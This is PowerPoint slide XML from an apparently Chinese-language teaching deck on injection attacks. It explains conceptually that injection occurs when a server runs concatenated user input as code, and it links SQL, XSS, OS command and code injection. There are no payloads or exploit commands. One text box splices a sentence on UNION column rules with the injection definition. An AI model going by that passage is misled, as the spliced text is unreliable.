        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC92771-E232-46FD-9576-C1A00DCA270E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1780764"/>
              <a:ext cx="3448463" cy="4047280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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pc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2531B153-C346-4B5F-9F15-E255D8568A5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1404892" y="1201756"/>
              <a:ext cx="3448463" cy="708964"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591774D6-0D2E-4924-8A2A-C05E7AFCEB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133956" y="2281840"/>
            <a:ext cx="6623742" cy="2625438"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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4000" b="1" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0704B6F-3385-4EC7-86DC-67C9A71CE192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918039" y="1727842"/>
            <a:ext cx="1355475" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>02.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4161C916-944D-4763-8B84-9D12DFF581A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10513692" y="1714500"/>
            <a:ext cx="787540" cy="787540"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B017DFD5-6ED9-4471-ABB5-07DB969177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665420" y="5227057"/>
            <a:ext cx="343873" cy="343873"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF4E3DC-0036-4E55-8BCA-1B5E78FA2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947448" y="3288454"/>
            <a:ext cx="4970991" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458710986"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据。中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021625" y="701566"/>
            <a:ext cx="1936180" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410111" y="2754990"/>
            <a:ext cx="2062355" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>两个关键条件：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14438BB9-6A08-4DA0-9EB7-A7F91B631AF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616950" y="1681438"/>
            <a:ext cx="8968988" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入攻击的本质是服务器把用户输入的数据拼接后当成代码执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEF21CB7-FCD5-4103-8E76-586875E4B786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807441" y="3346322"/>
            <a:ext cx="5950253" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第一个是用户能够控制输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第二个是程序要执行的代码，拼接了用户输入的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39D9C30F-9CBE-466A-B74E-CCF98E0E4AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8053256" y="2480108"/>
            <a:ext cx="3145944" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B30C849C-C885-4B0A-85B6-CCB3F2073CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8053255" y="3019379"/>
            <a:ext cx="3145945" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>前端代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E6067C-CF6E-435D-8A02-90A33AD3EC33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041154" y="3606846"/>
            <a:ext cx="3423398" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3181DAA7-4EA6-4FF3-879A-B90A204FB4C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8053255" y="4179833"/>
            <a:ext cx="2981091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>后端代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>代码注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
